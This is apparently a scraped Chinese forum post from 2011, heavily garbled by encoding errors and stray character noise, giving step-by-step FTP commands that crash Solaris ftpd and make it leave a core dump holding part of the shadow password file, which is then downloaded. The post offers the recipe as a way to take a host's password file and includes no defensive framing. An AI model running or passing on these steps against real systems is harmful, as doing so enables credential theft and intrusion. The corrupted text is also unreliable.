該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG����,使得用戶可以獲得該機(jī)的口令文件�����。具體過(guò)程如下:( n' V+ U- \8 D3 |3 S, X8 i1 |
, Q: L, R6 B/ k6 x% D
1.通過(guò) ftp 正常登錄到目的主機(jī)上9 {& a' {8 S8 l2 f! }
0 r: A# q; R9 L# e! ^5 d# k& Q2.輸入如下命令序列:
! ?5 u. V9 b. ?! U, I
; h$ T. [' A1 c0 C! U& Eftp> user root wrongpasswd% c# U/ a8 l; s
- s, \2 G9 o0 {$ K! O7 Tftp> quote pasv/ p% n/ z4 j! Z5 [9 M0 C/ l
8 t8 L6 p. N n' k; ?" F3.這時(shí)����,ftpd會(huì)報(bào)錯(cuò)退出,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core�����,口令文件就包含在這個(gè)core中��。' x3 @' @# O' T) k: `5 @! ~8 l
/ L: s7 c8 F3 I% |: K2 a
4.再次進(jìn)入FTP >get core
4 _6 f3 Y _5 U1 n
8 V! f9 D6 c/ l) O補(bǔ)充:雖然在core只有一部分shadow���,但是對(duì)于系統(tǒng)來(lái)說(shuō)已經(jīng)是致命的打擊了
4 Z4 C0 e! A6 T( B: ^+ Y
+ j. x5 b# \1 j) Y! ^8 T" M |
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡